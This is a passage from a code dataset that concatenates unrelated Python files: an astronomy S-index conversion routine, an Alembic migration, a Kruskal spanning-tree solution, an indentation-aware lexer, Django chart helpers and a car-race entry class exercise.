        Convert Mount-Wilson S-index into R_HK.
        Parameters
        ----------
        S : float
            Mount-Wilson S-index.
        Teff : float
            Effective temperature [K].
        bv : float
            B-V color [mag]
        lc : String, {ms, g}, optional
            Luminosity class; Main-sequence (ms) or giants (g)
        verbose : boolean, optional
            If True, the details of the calculation are printed
            to stdout.
        Returns
        -------
        RHK prime : float
            RHK parameter corrected for photospheric contribution. The primed
            number measures the purely chromospheric emission.
        RHK : float
            RHK parameter without correction for photospheric contribution.
        ccf : float
            The Ccf conversion factor used.
        fhfk : float
            The FH+FK surface flux in arbitrary units.
        fhfk (physical) : float
            The FH+FK surface flux in physical units [erg/cm^2/s].
        R_phot : float
            Photospheric flux contribution used in translating RHK into
            RHK prime.
        """
        # Get Ccf conversion factor
        log10ccf = self._log10ccf(bv, lc=lc)
        ccf = 10.0**log10ccf
        # Get FH+FK
        fhfk = self.FHFK(S, Teff, log10ccf)
        # Convert arbitrary units to physical units
        surfaceFlux = fhfk * self._absCal[self._afc]
        # Get RHK (includes photospheric contribution)
        rhk = surfaceFlux/(self._pc.sigma * Teff**4)
        # Get the photospheric correction
        logrphot = self._logrphot(bv, lc=lc)
        # Correct RHK for photospheric contribution
        rhkprime = rhk - 10.0**logrphot
        if verbose:
            print("Converting Mount-Wilson S-index to RHK")
            print("  Source of photospheric correction: " + self._rphots)
            print("  Source of Ccf conversion factor: " + self._ccfs)
            print("  log10ccf = %6.3e, ccf = %6.3e" % (log10ccf, ccf))
            print("  Surface flux in H and K pass-bands in arbitrary units: %6.3e" % (fhfk))
            print("  Arbitrary unit to flux conversion factor: %6.3e" % (self._absCal[self._afc]) + \
                  " from source: " + self._afc)
            print("  Surface flux in physical units [erg/cm^2/s]: %6.3e" % (surfaceFlux))
            print("  R_HK (including photosphere): %6.3e" % (rhk))
            print("  log10(R_HK) (including photosphere): %6.3e" % (np.log10(rhk)))
            print("  Photospheric contribution (log10(R_phot)): %6.3e" % logrphot)
            print("  R_HK prime (corrected for photospheric correction): %6.3e" % (rhkprime))
            print("  log10(R_HK prime) (corrected for photospheric correction): %6.3e" % ((np.log10(rhkprime))))
        return rhkprime, rhk, ccf, fhfk, surfaceFlux, 10.0**logrphot
| sczesla/PyAstronomy | src/pyasl/asl/sindex.py | sindex.py | py | 11,836 | python | en | code | 134 | github-code | 13 |
21230531925 | """empty message
Revision ID: 96db82cc5f09
Revises:
Create Date: 2023-09-15 11:46:08.150893
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '96db82cc5f09'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Apply this revision: create the ``student``, ``su_class`` and ``user`` tables.

    Auto-generated by ``alembic revision --autogenerate``; the table
    definitions must stay in lockstep with the ORM models at this revision.
    Note: ``class_id``/``user_id``/``stu_id`` are plain integer columns — no
    foreign-key constraints are declared here.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('student',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(), nullable=False),
    sa.Column('class_id', sa.Integer(), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=True),
    sa.Column('age', sa.String(length=90), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('su_class',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('class_name', sa.String(), nullable=False),
    sa.Column('stu_id', sa.Integer(), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('user',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('user_name', sa.String(length=90), nullable=False),
    sa.Column('phone_number', sa.String(), nullable=True),
    sa.Column('email', sa.String(length=90), nullable=False),
    sa.Column('age', sa.String(length=90), nullable=True),
    sa.Column('password', sa.Text(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email')
    )
    # ### end Alembic commands ###
def downgrade():
    """Revert this revision: drop the tables created in :func:`upgrade`.

    Tables are dropped in the reverse of their creation order.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('user')
    op.drop_table('su_class')
    op.drop_table('student')
    # ### end Alembic commands ###
| itsnotanant8288/simple-python-backend | migrations/versions/96db82cc5f09_.py | 96db82cc5f09_.py | py | 1,684 | python | en | code | 0 | github-code | 13 |
import sys

# NOTE(review): an effectively unlimited recursion limit disables Python's
# RecursionError guard, so very deep recursion (e.g. in findSet) would hit the
# C stack directly instead of raising — a bound tied to MAX would be safer;
# confirm before changing.
sys.setrecursionlimit(1000000000)
INF = 1000000009  # "infinity" sentinel (not referenced below)
MAX = 100001      # problem-size upper bound (not referenced below)
dist = []         # edges accepted into the minimum spanning tree
graph = []        # all input edges, as Triad objects
class Triad:
    """A weighted edge (source, target, weight) with a total ordering.

    Edges compare by weight first; ties are broken by source, then target,
    so sorting a list of Triads is deterministic.
    """

    def __init__(self, source, target, weight):
        self.source = source
        self.target = target
        self.weight = weight

    def __lt__(self, other):
        # Lexicographic tuple comparison encodes the weight/source/target order.
        return (self.weight, self.source, self.target) < \
               (other.weight, other.source, other.target)
def makeSet(v):
    """Initialise the disjoint-set forest for vertices 0..v.

    Resets the module-level ``parent`` (each node its own root) and
    ``ranks`` (all zero) arrays.
    """
    global parent, ranks
    parent = list(range(v + 1))
    ranks = [0] * (v + 1)
def findSet(u):
    """Return the representative (root) of u's set, with full path compression.

    Iterative rewrite of the recursive find: with this file's enormous
    recursion limit, a long parent chain could otherwise exhaust the C stack
    instead of raising RecursionError.  The final ``parent`` state and return
    value are identical to the recursive version: every node on the path is
    re-pointed directly at the root.
    """
    # First pass: walk up to the root.
    root = u
    while parent[root] != root:
        root = parent[root]
    # Second pass: compress the path so future finds are O(1)-ish.
    while parent[u] != root:
        parent[u], u = root, parent[u]
    return root
def unionSet(u, v):
    """Merge the sets containing u and v using union by rank."""
    root_u = findSet(u)
    root_v = findSet(v)
    if root_u == root_v:
        return  # already in the same component
    if ranks[root_u] > ranks[root_v]:
        # u's tree is taller: hang v's root beneath it.
        parent[root_v] = root_u
    elif ranks[root_u] < ranks[root_v]:
        parent[root_u] = root_v
    else:
        # Equal ranks: pick root_v as the new root and bump its rank.
        parent[root_u] = root_v
        ranks[root_v] += 1
def calcMST():
    """Return the total weight of the edges currently stored in ``dist``."""
    return sum(edge.weight for edge in dist)
def Kruskal(V):
    """Run Kruskal's algorithm over ``graph``, collecting MST edges in ``dist``.

    Edges are considered in ascending (weight, source, target) order; an edge
    is kept only when it joins two different components.  Stops once V - 1
    edges have been accepted.
    """
    graph.sort()
    for edge in graph:
        if len(dist) == V - 1:
            break  # spanning tree is complete
        root_a = findSet(edge.source)
        root_b = findSet(edge.target)
        if root_a != root_b:
            dist.append(edge)
            unionSet(root_a, root_b)
def minPrice(s):
    """Return the MST cost over ``s`` vertices, or -1 if the graph is disconnected."""
    makeSet(s)
    Kruskal(s)
    # Every vertex must share vertex 0's representative, or there is no
    # spanning tree at all.
    for vertex in range(1, s):
        if findSet(vertex) != findSet(0):
            return -1
    return sum(edge.weight for edge in dist)
# Read test cases until the terminating "0 0" line.  Each case: S station
# names, C connections "from to cost", then one query station name (which
# does not affect the MST cost).
while True:
    S, C = map(int, input().split(' '))
    if S == 0 and C == 0:
        break
    graph.clear()
    dist.clear()
    station = {}
    for index in range(S):
        station[input()] = index
    for _ in range(C):
        parts = input().split(' ')
        graph.append(Triad(station[parts[0]], station[parts[1]], int(parts[2])))
    input()  # query station name -- irrelevant to the total cost
    res = minPrice(S)
    print(res if res != -1 else "Impossible")
| truclycs/code_for_fun | algorithms/python/python_blue/L21/_11710___Expensive_subway.py | _11710___Expensive_subway.py | py | 2,129 | python | en | code | 7 | github-code | 13 |
39424037573 | import re
from enum import Enum
from PreLexer import PreLexer, Token, RecognitionException
from CompilerException import CompilerException
# TODO: move to utils?
def iterUntil(func, cond):
    """Yield successive results of ``func()`` until ``cond(result)`` is true.

    The first result satisfying ``cond`` is consumed but not yielded.
    """
    while True:
        value = func()
        if cond(value):
            return
        yield value
# Gives numbers to tokens, and generates a token specification for antlr parser
def _enumerateTokens(tokens):
    """Build a token-numbering class from a list of token-name tuples.

    Each element of *tokens* is a tuple whose first entry is the canonical
    token name and whose remaining entries are alias spellings.  All names in
    one tuple share a single integer id; ids are assigned consecutively
    starting at ``Token.MIN_USER_TOKEN_TYPE``.  Names that also exist as
    ``PreLexer`` attributes get a PreLexer-id -> new-id mapping used by
    ``fromPreLexerTokenType``.
    """
    class EnumeratedTokens:
        @staticmethod
        def exportToAntlr():
            # One "name=id" line per alias, in the format ANTLR token
            # specification files expect.
            allTokens = EnumeratedTokens._allTokens
            return '\n'.join("{}={}".format(name, index)
                             for name, index in allTokens.items())

        @staticmethod
        def fromPreLexerTokenType(token):
            # EOF has the same sentinel value in both numbering schemes.
            if token == Token.EOF:
                return Token.EOF
            tokenMap = EnumeratedTokens._fromPrelexerTokens
            if token in tokenMap:
                return tokenMap[token]
            raise RuntimeError("Invalid token value %d" % token)

        EOF = Token.EOF
        _allTokens = {}           # alias name -> token id (every alias)
        _fromPrelexerTokens = {}  # PreLexer token id -> AHToken id

    for i, token in enumerate(tokens, Token.MIN_USER_TOKEN_TYPE):
        for name in token:
            # Only set the attribute if the name is free, so existing class
            # members (the methods above) are never clobbered.
            if not hasattr(EnumeratedTokens, name):
                setattr(EnumeratedTokens, name, i)
            EnumeratedTokens._allTokens[name] = i
            if hasattr(PreLexer, name):
                prelexerIndex = getattr(PreLexer, name)
                EnumeratedTokens._fromPrelexerTokens[prelexerIndex] = i
    return EnumeratedTokens
# Token ids for the AH language.  Each tuple lists the canonical token name
# first, followed by alternative spellings that share the same id in the
# exported ANTLR token specification.
AHToken = _enumerateTokens([
    ('LParen', "'('"),
    ('RParen', "')'"),
    ('Dot', "'.'"),
    ('RArrow', "'->'", "'→'"),
    ('RDoubleArrow', "'=>'", "'⇒'"),
    ('Equal', "'='"),
    ('Underscore', "'_'"),
    ('Colon', "':'"),
    ('BeginBlock',),
    ('EndBlock',),
    ('Data', "'data'"),
    ('Where', "'where'"),
    ('Module', "'module'"),
    ('From', "'from'"),
    ('Import', "'import'"),
    ('Pragma', "'pragma'"),
    ('NEWLINE',),
    ('ID',)])
def convertPreLexerTokenToAHToken(token):
    """Clone a PreLexer token, remapping its type into the AHToken numbering."""
    clone = token.clone()
    clone.type = AHToken.fromPreLexerTokenType(token.type)
    return clone
class LexerError(CompilerException):
    """A lexical error annotated with the source location where it occurred."""

    def __init__(self, msg, line, column, pos):
        super().__init__(msg)
        self.line = line
        self.column = column
        self.pos = pos

    def __str__(self):
        base = super().__str__()
        return "[{0}-{1}] {2}".format(self.line, self.column, base)
# This lexer modifies the PreLexer token stream in order to handle
# indentation. Most tokens are passed through unchanged.
# Several transformations are applied to the token stream:
# 1. Whenever a 'where' token occurs, a 'BeginBlock' token is also emitted and
#    a new indented block (possibly empty) is started. No newline is emitted
#    after 'where'. When the indented block ends, an 'EndBlock' token is
#    emitted.
# 2. If a newline is followed by increased indentation, it is treated as a
#    line continuation: the lines are joined and no newline token is emitted.
# 3. When several newlines occur in a row, all but the first are dropped.
#    This includes newlines absorbed by rule (2).
# 4. Just before EOF, a newline token is guaranteed to be present (one is
#    added if missing).
#
# Implements TokenStream
class AHLexer:
    """Indentation-aware token stream built on top of PreLexer.

    Implemented as a small state machine: ``nextToken`` dispatches to the
    handler for the current state.  Handlers consume PreLexer tokens, may
    stash a single lookahead token in ``_lookaheadToken``, and synthesize
    BeginBlock / EndBlock / NEWLINE tokens based on the stack of active
    block indentations in ``_indentations``.
    """

    def __init__(self, input=None):
        # TODO: possibly clear error listeners and maybe modify error handling
        # strategy
        self._prelexer = PreLexer(input)
        # Stack of indentation columns for the currently open blocks; the
        # top entry is the indentation of the innermost block.
        self._indentations = [ ]
        self._state_handlers = {
            'FILE_START': self._state_file_start,
            'DEFAULT': self._state_default,
            'BEGIN_BLOCK': self._state_begin_block,
            'FIND_INDENTATION': self._state_find_indentation,
            'CLOSE_ALL_SCOPES': self._state_close_all_scopes,
            'CLOSE_SCOPE': self._state_close_scope,
            'EOF': self._state_eof
        }
        self._State = Enum('_State', list(self._state_handlers.keys()))
        self._state = self._State.FILE_START
        # Some states want to know what token is next, but postpone emitting it
        self._lookaheadToken = None

    # TokenSource interface

    def getCharPositionInLine(self):
        return self._prelexer.getCharPositionInLine()

    def getInputStream(self):
        return self._prelexer.getInputStream()

    def getLine(self):
        return self._prelexer.getLine()

    def getSourceName(self):
        return self._prelexer.getSourceName()

    def getTokenFactory(self):
        return self._prelexer.getTokenFactory()

    def nextToken(self):
        """Return the next token by dispatching to the current state handler."""
        if self._state.name not in self._state_handlers:
            raise RuntimeError("Invalid state")
        return self._state_handlers[self._state.name]()

    def setTokenFactory(self, factory):
        return self._prelexer.setTokenFactory(factory)

    # TODO: potentially change implementation and add other error listener methods
    def addErrorListener(self, listener):
        self._prelexer.addErrorListener(listener)

    def removeErrorListeners(self):
        self._prelexer.removeErrorListeners()

    # Private methods

    def _state_file_start(self):
        # Establish the file's base indentation from the first real token.
        nextToken = self._skip_newlines()
        if nextToken.type == Token.EOF:
            self._push_indentation(0)
            return self._gotoState(self._State.EOF)
        self._push_indentation(nextToken.column)
        self._lookaheadToken = nextToken
        return self._gotoState(self._State.DEFAULT)

    def _state_default(self):
        # Ordinary pass-through state: emit the stashed lookahead token if
        # there is one, otherwise pull the next token from PreLexer.
        if self._lookaheadToken is not None:
            nextToken = self._lookaheadToken
            self._lookaheadToken = None
        else:
            nextToken = self._prelexer.nextToken()
        if nextToken.type == PreLexer.NEWLINE:
            return self._maybe_newline(nextToken)
        elif nextToken.type == PreLexer.Where:
            # 'where' opens a new indented block; BeginBlock follows next call.
            self._state = self._State.BEGIN_BLOCK
            return convertPreLexerTokenToAHToken(nextToken)
        elif nextToken.type == Token.EOF:
            # Guarantee a trailing NEWLINE before closing all open scopes.
            self._state = self._State.CLOSE_ALL_SCOPES
            return self._make_token(AHToken.NEWLINE, '\n')
        else:
            return convertPreLexerTokenToAHToken(nextToken)

    # Precondition: self._lookaheadToken is None
    def _state_begin_block(self):
        self._state = self._State.FIND_INDENTATION
        return self._make_token(AHToken.BeginBlock, "<Begin Block>")

    # Precondition: self._lookaheadToken is None
    def _state_find_indentation(self):
        # Determine the indentation of the block opened by 'where'.
        nextToken = self._skip_newlines()
        currentIndentation = self._top_indentation()
        if nextToken.type == Token.EOF:
            # Empty block
            self._push_indentation(currentIndentation + 1)
            return self._gotoState(self._State.CLOSE_ALL_SCOPES)
        if nextToken.column > currentIndentation:
            self._push_indentation(nextToken.column)
            self._lookaheadToken = nextToken
            return self._gotoState(self._State.DEFAULT)
        else:
            # Empty block
            self._push_indentation(currentIndentation + 1)
            self._lookaheadToken = nextToken
            return self._gotoState(self._State.CLOSE_SCOPE)

    # Preconditions: * self._lookaheadToken is not None
    #                * lookaheadToken indentation is lower than top of
    #                  indentation stack
    def _state_close_scope(self):
        token = self._lookaheadToken
        assert token is not None
        assert token.column < self._top_indentation()
        if self._is_lowest_indentation_block():
            raise LexerError(
                "Indentation error. Indentation is lower than lowest block",
                token.line, token.column, token.start)
        self._pop_indentation()
        currentIndentation = self._top_indentation()
        if token.column < currentIndentation:
            pass # Continue closing scopes
        elif token.column == currentIndentation:
            # Close block and process lookahead token as usual
            self._state = self._State.DEFAULT
        else: # token.column > currentIndentation
            raise LexerError("Indentation error. Can't continue expression "
                             "after closing block", token.line, token.column,
                             token.start)
        # TODO: creating tokens <Start Block> and <End Block> should be refactored
        return self._make_token(AHToken.EndBlock, "<End Block>")

    # Precondition: * self._lookaheadToken is None
    #               * last read token was EOF
    def _state_close_all_scopes(self):
        # Emit one EndBlock per remaining open block, then move to EOF.
        if self._is_lowest_indentation_block():
            return self._gotoState(self._State.EOF)
        self._pop_indentation()
        return self._make_token(AHToken.EndBlock, "<End Block>")

    # Precondition: * self._lookaheadToken is None
    #               * last read token was EOF
    #               * All indentation blocks are closed
    def _state_eof(self):
        return self._prelexer.emitEOF()

    def _maybe_newline(self, newlineToken):
        """Decide what a NEWLINE means by peeking at the token after it.

        Depending on the indentation of the next real token the newline is
        emitted as-is (same indentation), swallowed as a line continuation
        (deeper indentation), or emitted while scheduling scope closing
        (shallower indentation).
        """
        nextToken = self._skip_newlines()
        if nextToken.type == Token.EOF:
            self._state = self._State.CLOSE_ALL_SCOPES
            return convertPreLexerTokenToAHToken(newlineToken)
        currentIndentation = self._top_indentation()
        if nextToken.column == currentIndentation:
            # Alright, start new line
            self._lookaheadToken = nextToken
            self._state = self._State.DEFAULT
            return convertPreLexerTokenToAHToken(newlineToken)
        elif nextToken.column > currentIndentation:
            # Just continue previous line
            self._state = self._State.DEFAULT
            return convertPreLexerTokenToAHToken(nextToken)
        else:
            # It's new line and also closing scope
            self._lookaheadToken = nextToken
            self._state = self._State.CLOSE_SCOPE
            return convertPreLexerTokenToAHToken(newlineToken)

    def _is_lowest_indentation_block(self):
        return 1 == len(self._indentations)

    def _push_indentation(self, value):
        self._indentations.append(value)

    def _pop_indentation(self):
        return self._indentations.pop()

    def _top_indentation(self):
        return self._indentations[-1]

    def _skip_newlines(self):
        # Collapse any run of NEWLINE tokens, returning the first non-newline.
        nextToken = self._prelexer.nextToken()
        while nextToken.type == PreLexer.NEWLINE:
            nextToken = self._prelexer.nextToken()
        return nextToken

    # TODO: this method name is not clear, it makes zero-width token
    def _make_token(self, type, text):
        # Synthesize a zero-width token at the current input position using
        # the underlying lexer's token factory.
        pl = self._prelexer
        return pl._factory.create(
            pl._tokenFactorySourcePair,
            type,
            text,
            pl.DEFAULT_TOKEN_CHANNEL,
            pl._input.index,
            pl._input.index - 1,
            pl.line,
            pl.column
        )

    def _gotoState(self, state):
        # Switch state and immediately run the new state's handler.
        self._state = state
        return self._state_handlers[state.name]()
| demin-dmitriy/almost-haskell | src/AHLexer.py | AHLexer.py | py | 10,926 | python | en | code | 1 | github-code | 13 |
21043641485 | from profiles.models import Profile
from customers.models import Customer
from io import BytesIO
import base64
import matplotlib.pyplot as plt
def get_salesman(val):
    """Return the username of the Profile whose primary key is ``val``."""
    profile = Profile.objects.get(id=val)
    return profile.user.username
def get_customer(val):
    """Return the name of the Customer whose primary key is ``val``."""
    customer = Customer.objects.get(id=val)
    return customer.name
def get_graph():
    """Render the current matplotlib figure as a base64-encoded PNG string."""
    buffer = BytesIO()
    plt.savefig(buffer, format='png')
    buffer.seek(0)
    encoded = base64.b64encode(buffer.getvalue()).decode('utf-8')
    buffer.close()
    return encoded
def get_key(res_by):
    """Map a results-by choice code to the DataFrame column to group on.

    Returns None for any unrecognised code, matching the previous behaviour.
    """
    return {'#1': 'transaction_id', '#2': 'created'}.get(res_by)
def get_chart(chart_type, data, results_by, **kwargs):
    """Plot summed ``total_price`` per group and return the figure as a
    base64-encoded PNG (see ``get_graph``).

    chart_type: '#1' bar, '#2' pie, '#3' line; any other value plots nothing
    and prints a warning.  ``results_by`` selects the grouping column via
    ``get_key``.
    """
    plt.switch_backend('AGG')
    plt.figure(figsize=(10, 4))
    key = get_key(results_by)
    # Sum total_price per group, keeping the group key as a regular column.
    grouped = data.groupby(key, as_index=False)['total_price'].agg('sum')
    if chart_type == '#1':
        plt.bar(grouped[key], grouped['total_price'])
    elif chart_type == '#2':
        plt.pie(data=grouped, x='total_price', labels=grouped[key].values)
    elif chart_type == '#3':
        plt.plot(grouped[key], grouped['total_price'],
                 color='red', marker='*', linestyle='dotted')
    else:
        print('Wrong Choice')
    plt.tight_layout()
    return get_graph()
return chart | sandeep-045/python-training | django/reports_proj/sales/utils.py | utils.py | py | 1,355 | python | en | code | 0 | github-code | 13 |
42818968215 | import datetime as dt
class Car:
    """A road vehicle.

    :param str make: Manufacturer of the car.
    :param str model: Model name of the car.
    :param int year: Year of manufacture.
    """

    def __init__(self, make, model, year):
        self.year = year
        self.model = model
        self.make = make
class Entry(Car):
    """A car to be entered into a race.

    :param str driver:
        The driver of the car.
    :param int number:
        The car's racing number (0-99).
    """

    def __init__(self, make, model, year, driver, number):
        # Python 3 zero-argument super() replaces the old two-argument form.
        super().__init__(make, model, year)
        self.driver = driver
        self.number = number

    @classmethod
    def user_input(cls):
        """Prompt the user for attributes for Entry.

        Re-prompts until the year and racing number are valid integers in
        their allowed ranges.

        :return:
            An Entry built from the validated input.
        """
        min_year = 1886  # year the first automobile was built
        max_year = dt.date.today().year + 1  # next model year already exists
        print(
            "CARefully enter the data for each of the following prompts."
        )
        make = input("Make: ").strip().title()
        model = input("Model: ").strip().title()
        while True:
            year = input("Year: ").strip()
            try:
                year = int(year)
            except ValueError:
                print(" The years of vehicle must be expressed as "
                      "integers.")
            else:
                if year < min_year:
                    print(f" Easy there, time traveller. The first car "
                          f"wasn't invented until {min_year}.")
                elif year > max_year:
                    print(f" The {max_year + 1} models aren't even out "
                          f"yet, so why did you enter {year}?")
                else:
                    break
        driver = input("Driver: ").strip().title()
        while True:
            number = input("Number (0-99): ").strip()
            try:
                number = int(number)
            except ValueError:
                print(" Driver numbers must be expressed as integers.")
            else:
                # Chained comparison replaces the `number in range(0, 99+1)`
                # membership test; behaviour is identical for ints.
                if 0 <= number <= 99:
                    break
                else:
                    print(" The number entered is out of range.")
        return cls(make, model, year, driver, number)

    def print_entry(self):
        """Print the attributes of this Entry, one per line.

        :rtype: None
        """
        print(f"Make: {self.make}")
        print(f"Model: {self.model}")
        print(f"Year: {self.year}")
        print(f"Driver: {self.driver}")
        print(f"Number: {self.number}")

    # Backward-compatible alias: existing callers use the pre-PEP8 camelCase
    # name (the original file itself flagged it as a PEP 8 violation).
    printEntry = print_entry
def main():
    """Collect three race entries from the user, then display them."""
    entries = []
    while len(entries) < 3:
        print(f"\nENTRY {len(entries) + 1}")
        entries.append(Entry.user_input())
    print(
        "\nVerbatim instructions:\n"
        "\"Finally, write a section of the program that creates a list of 3\n"
        "Entry objects. For each of these objects, prompt the user for the\n"
        "the make, model, year, driver, and number. Finally print out this\n"
        "list.\"\n"
        "Printing the list of Entry objects:\n",
        entries,
        "\n"
    )
    for position, entry in enumerate(entries, start=1):
        print(f"---Printing details of ENTRY {position}---")
        entry.printEntry()
if __name__ == "__main__":
# x = dt.date.today().year + 1
# print(x)
# print(type(x))
# x = Entry.user_input()
# print(x)
# print(x.make)
main()
# All work and no play makes Jack a dull boy.
| smallpythoncode/csci161 | assignments/final/jahnke_kenneth_final_part4.py | jahnke_kenneth_final_part4.py | py | 3,609 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.